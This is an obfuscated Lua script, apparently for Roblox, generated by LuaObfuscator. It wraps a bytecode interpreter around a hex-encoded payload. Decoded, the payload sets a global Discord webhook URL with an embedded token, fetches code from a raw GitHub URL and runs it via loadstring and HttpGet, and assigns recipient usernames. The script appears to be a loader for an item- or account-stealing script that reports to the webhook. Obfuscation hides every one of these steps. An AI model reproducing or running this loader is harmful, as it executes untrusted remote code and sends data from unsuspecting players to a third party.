--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v69,v19);v19=nil;v79=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-((2 + 0) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=(1321 -394) -(214 + (1778 -(68 + 997))) ;local v72;while true do if (v71==(0 + 0)) then v72=((1271 -(226 + 1044)) + 1)^(v32-(878 -((1227 -945) + 595))) ;return (((v31%(v72 + v72))>=v72) and (1638 -(1523 + 114))) or 0 ;end end end end local function v21()local v34=117 -(32 + (202 -117)) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=958 -(892 + 65) ;end if (v34==1) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * 256) + v36 ;end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((487 -306) -(67 + 113))) then return (v42 * ((22315877 -10013600) + 4474939)) + (v41 * 65536) + (v40 * 256) + v39 ;end if (v38==((0 + 0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end end end local function v24()local v43=997 -(915 + 82) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(8 -5)) then if (v48==0) then if (v47==(0 + 0)) then return v49 * ((0 -0) -0) ;else v48=1;v46=1187 -(1069 + 118) ;end elseif (v48==(4643 -2596)) then return ((v47==(0 -0)) and (v49 * ((1 + 0)/0))) or (v49 * NaN) ;end return v8(v49,v48-((6452 -4635) -794) ) * (v46 + (v47/((2 + 0)^(843 -(368 + 423))))) ;end if (v43==(0 -(859 -(814 + 45)))) then v44=v23();v45=v23();v43=(46 -27) -(10 + 8) ;end if (v43==(7 -5)) then v48=v20(v45,463 -(416 + 26) ,98 -(4 + 63) );v49=((v20(v45,14 + 18 )==(1 -0)) and  -1) or ((156 + 283) -(145 + 293)) ;v43=433 -(44 + 386) ;end if (v43==(1487 -((1883 -(261 + 624)) + 488))) then v46=1 + 0 ;v47=(v20(v45,1 + 0 ,792 -(201 + 571) ) * ((1140 -(116 + 1022))^(133 -101))) + v44 ;v43=2 + 0 ;end end end local function v25(v50)local v51=0;local v52;local v53;while true do if (v51==(4 -(767 -(745 + 21)))) then return v6(v53);end if (v51==(1082 -(1020 + 60))) then v53={};for v81=(490 + 934) -(630 + 793) , #v52 do v53[v81]=v2(v1(v3(v52,v81,v81)));end v51=9 -6 ;end if (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=3 -2 ;end if (v51==(1748 -(760 + 987))) then v52=v3(v16,v18,(v18 + v50) -(1914 -(1789 + 124)) );v18=v18 + v50 ;v51=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=1210 -(1035 + 175) ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (2~=v54) then else v59=nil;v60=nil;v54=563 -(306 + 254) ;end if (v54~=0) then else local v73=0;local v74;while true do if (v73~=0) then else v74=0 + 0 ;while true do if (v74~=(0 -0)) then else local v109=0;while true do if (v109~=0) then else v55=1467 -(899 + 568) ;v56=nil;v109=1;end if (v109~=1) then else v74=1;break;end end end if (v74==(1 + 0)) then v54=2 -1 ;break;end end break;end end end if (v54~=1) then else local v75=603 -(268 + 335) ;while true do if (v75~=(290 -(60 + 230))) then else local v102=572 -(426 + 146) ;while true do if (v102~=1) then else v75=1;break;end if (v102~=(0 + 0)) then else v57=nil;v58=nil;v102=1457 -(282 + 1174) ;end end end if (v75~=1) then else v54=2;break;end end end if (v54==(814 -(569 + 242))) then v61=nil;while true do local v83=0;local v84;local v85;while true do if ((2 -1)==v83) then while true do if (v84==0) then v85=0 + 0 ;while true do if (v85~=(1024 -(706 + 318))) then else local v110=1251 -(721 + 530) ;while true do if (v110==(1272 -(945 + 326))) then v85=2 -1 ;break;end if (v110==0) then if (v55==3) then local v139=0 + 0 ;local v140;while true do if (0~=v139) then else v140=0;while true do if (v140~=(700 -(271 + 429))) then else local v207=0 + 0 ;while true do if (v207==0) then for v215=1,v23() do v57[v215-(1501 -(1408 + 92)) ]=v28();end return v59;end end end end break;end end end if (v55==0) then local v141=1086 -(461 + 625) ;while true do if (v141~=(1289 -(993 + 295))) then else v58={};v55=1 + 0 ;break;end if (v141==(1171 -(418 + 753))) then local v202=0 + 0 ;local v203;while true do if (v202~=(0 + 0)) then else v203=0;while true do if (v203~=(0 + 0)) then else local v208=0;while true do if ((1 + 0)==v208) then v203=1;break;end if (v208==(529 -(406 + 123))) then v56={};v57={};v208=1;end end end if ((1770 -(1749 + 20))==v203) then v141=1 + 0 ;break;end end break;end end end end end v110=1;end end end if ((1323 -(1249 + 73))==v85) then if (v55==(1 + 1)) then local v114=0;while true do if (v114==1) then for v144=1146 -(466 + 679) ,v23() do local v145=0 -0 ;local v146;local v147;while true do if (v145==1) then while true do if (v146==(0 -0)) then v147=v21();if (v20(v147,1,1)~=0) then else local v209=1900 -(106 + 1794) ;local v210;local v211;local v212;local v213;local v214;while true do if (v209~=(1 + 1)) then else v214=nil;while true do if (v210~=2) then else while true do if (2~=v211) then else local v220=0;while true do if (v220~=(0 + 0)) then else local v227=0;while true do if ((2 -1)==v227) then v220=1;break;end if (v227==0) then if (v20(v213,1,2 -1 )==1) then v214[2]=v61[v214[2]];end if (v20(v213,116 -(4 + 110) ,2)==(585 -(57 + 527))) then v214[1430 -(41 + 1386) ]=v61[v214[3]];end v227=104 -(17 + 86) ;end end end if (v220~=1) then else v211=3;break;end end end if (v211==(3 + 0)) then if (v20(v213,6 -3 ,3)==(2 -1)) then v214[170 -(122 + 44) ]=v61[v214[6 -2 ]];end v56[v144]=v214;break;end if ((3 -2)~=v211) then else v214={v22(),v22(),nil,nil};if (v212==0) then local v225=0;local v226;while true do if (v225==0) then v226=65 -(30 + 35) ;while true do if (v226==0) then v214[3 + 0 ]=v22();v214[1261 -(1043 + 214) ]=v22();break;end end break;end end elseif (v212==(3 -2)) then v214[1215 -(323 + 889) ]=v23();elseif (v212==(5 -3)) then v214[3]=v23() -(2^(596 -(361 + 219))) ;elseif (v212==(323 -(53 + 267))) then local v237=0;local v238;local v239;local v240;while true do if (1==v237) then v240=nil;while true do if (v238==(0 + 0)) then local v241=413 -(15 + 398) ;while true do if (v241~=1) then else v238=1;break;end if (v241==(982 -(18 + 964))) then v239=0;v240=nil;v241=3 -2 ;end end end if (v238~=(1 + 0)) then else while true do if (v239~=0) then else v240=0;while true do if (v240==(0 + 0)) then v214[853 -(20 + 830) ]=v23() -((2 + 0)^16) ;v214[130 -(116 + 10) ]=v22();break;end end break;end end break;end end break;end if (v237~=(0 + 0)) then else v238=0;v239=nil;v237=1;end end end v211=740 -(542 + 196) ;end if (v211==0) then local v222=0 -0 ;while true do if (v222~=(1 + 0)) then else v211=1;break;end if (v222==(0 + 0)) then local v228=0 + 0 ;while true do if (v228~=1) then else v222=2 -1 ;break;end if (v228==0) then v212=v20(v147,4 -2 ,1554 -(1126 + 425) );v213=v20(v147,409 -(118 + 287) ,23 -17 );v228=1122 -(118 + 1003) ;end end end end end end break;end if (v210~=1) then else local v218=0;while true do if (v218~=(2 -1)) then else v210=2;break;end if (0~=v218) then else v213=nil;v214=nil;v218=378 -(142 + 235) ;end end end if (v210~=(0 -0)) then else local v219=0;while true do if (v219~=0) then else v211=0;v212=nil;v219=1;end if (v219~=(1 + 0)) then else v210=1;break;end end end end break;end if (v209==(978 -(553 + 424))) then v212=nil;v213=nil;v209=3 -1 ;end if (v209==0) then v210=0 + 0 ;v211=nil;v209=1 + 0 ;end end end break;end end break;end if (v145==(0 + 0)) then v146=0 + 0 ;v147=nil;v145=1 + 0 ;end end end v55=6 -3 ;break;end if (0==v114) then for v148=1,v60 do local v149=0;local v150;local v151;local v152;local v153;while true do if ((0 -0)==v149) then v150=0;v151=nil;v149=1;end if (v149~=1) then else v152=nil;v153=nil;v149=2;end if (v149==(4 -2)) then while true do if (v150~=0) then else v151=0;v152=nil;v150=1 + 0 ;end if (v150~=1) then else v153=nil;while true do if (v151~=(0 -0)) then else v152=v21();v153=nil;v151=754 -(239 + 514) ;end if (v151==1) then if (v152==(1 + 0)) then v153=v21()~=0 ;elseif (v152==2) then v153=v24();elseif (v152~=(1332 -(797 + 532))) then else v153=v25();end v61[v148]=v153;break;end end break;end end break;end end end v59[3]=v21();v114=1 + 0 ;end end end if (v55==(1 + 0)) then local v115=0;local v116;while true do if (v115==(0 -0)) then v116=1202 -(373 + 829) ;while true do if (v116==0) then local v204=0;while true do if (0==v204) then v59={v56,v57,nil,v58};v60=v23();v204=1 + 0 ;end if (v204~=(1 -0)) then else v116=1;break;end end end if (1==v116) then v61={};v55=3 -1 ;break;end end break;end end end break;end end break;end end break;end if (v83~=0) then else v84=0;v85=nil;v83=239 -(64 + 174) ;end end end break;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v86=v66;local v87=v67;local v88=v68;local v89=v27;local v90=1;local v91= -1;local v92={};local v93={...};local v94=v12("#",...) -1 ;local v95={};local v96={};for v100=0,v94 do if (v100>=v88) then v92[v100-v88 ]=v93[v100 + 1 ];else v96[v100]=v93[v100 + 1 ];end end local v97=(v94-v88) + 1 ;local v98;local v99;while true do local v101=0;while true do if (v101==1) then if (v99<=5) then if (v99<=2) then if (v99<=0) then v96[v98[2]]=v64[v98[3]];elseif (v99==1) then v96[v98[2]][v98[3]]=v98[4];else local v119=0;local v120;local v121;while true do if (v119==0) then v120=v98[2];v121=v96[v98[3]];v119=1;end if (v119==1) then v96[v120 + 1 ]=v121;v96[v120]=v121[v98[4]];break;end end end elseif (v99<=3) then v96[v98[2]]();elseif (v99>4) then v96[v98[2]]=v98[3];else v96[v98[2]]=v98[3]~=0 ;end elseif (v99<=8) then if (v99<=6) then v90=v98[3];elseif (v99==7) then if (v96[v98[2]]==v98[4]) then v90=v90 + 1 ;else v90=v98[3];end else local v125=0;while true do if (v125==4) then v90=v98[3];break;end if (v125==2) then v96[v98[2]][v98[3]]=v98[4];v90=v90 + 1 ;v98=v86[v90];v125=3;end if (v125==3) then v96[v98[2]]=v98[3];v90=v90 + 1 ;v98=v86[v90];v125=4;end if (v125==0) then v96[v98[2]][v98[3]]=v98[4];v90=v90 + 1 ;v98=v86[v90];v125=1;end if (v125==1) then v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v125=2;end end end elseif (v99<=10) then if (v99==9) then do return;end else local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if (v126==5) then v131=v98[2];v128,v129=v89(v96[v131](v13(v96,v131 + 1 ,v98[3])));v91=(v129 + v131) -1 ;v127=0;for v197=v131,v91 do local v198=0;while true do if (v198==0) then v127=v127 + 1 ;v96[v197]=v128[v127];break;end end end v126=6;end if (v126==0) then v127=nil;v128,v129=nil;v130=nil;v131=nil;v96[v98[2]][v98[3]]=v98[4];v126=1;end if (v126==3) then v96[v131 + 1 ]=v130;v96[v131]=v130[v98[4]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];v126=4;end if (v126==4) then v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3]~=0 ;v90=v90 + 1 ;v98=v86[v90];v126=5;end if (v126==6) then v90=v90 + 1 ;v98=v86[v90];v131=v98[2];v96[v131]=v96[v131](v13(v96,v131 + 1 ,v91));v90=v90 + 1 ;v126=7;end if (v126==2) then v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v131=v98[2];v130=v96[v98[3]];v126=3;end if (v126==7) then v98=v86[v90];v96[v98[2]]();v90=v90 + 1 ;v98=v86[v90];v90=v98[3];break;end if (v126==1) then v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v126=2;end end end elseif (v99>11) then local v132=v98[2];v96[v132]=v96[v132](v13(v96,v132 + 1 ,v91));else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==1) then v91=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==2) then for v199=v135,v91 do v138=v138 + 1 ;v96[v199]=v136[v138];end break;end if (v134==0) then v135=v98[2];v136,v137=v89(v96[v135](v13(v96,v135 + 1 ,v98[3])));v134=1;end end end v90=v90 + 1 ;break;end if (0==v101) then v98=v86[v90];v99=v98[1];v101=1;end end end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O3731392O34383132343731393133352F73776A5356346A6631486B4E7337354744497951306A7746484A32726157365F785F4B546E4D333447485F584E39587A665876706F31487A566C62415A357370317A4368030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C79706865725363726970747A2F6D61696E2F4C797068657203083O00557365724E616D6503093O004C79706865725F313703093O00557365724E616D653200173O0012053O00013O0026073O000E000100020004063O000E000100122O000100033O00300A00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026073O0001000100010004063O0001000100122O000100033O0030080001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00093O00017O00",v9(),...);end
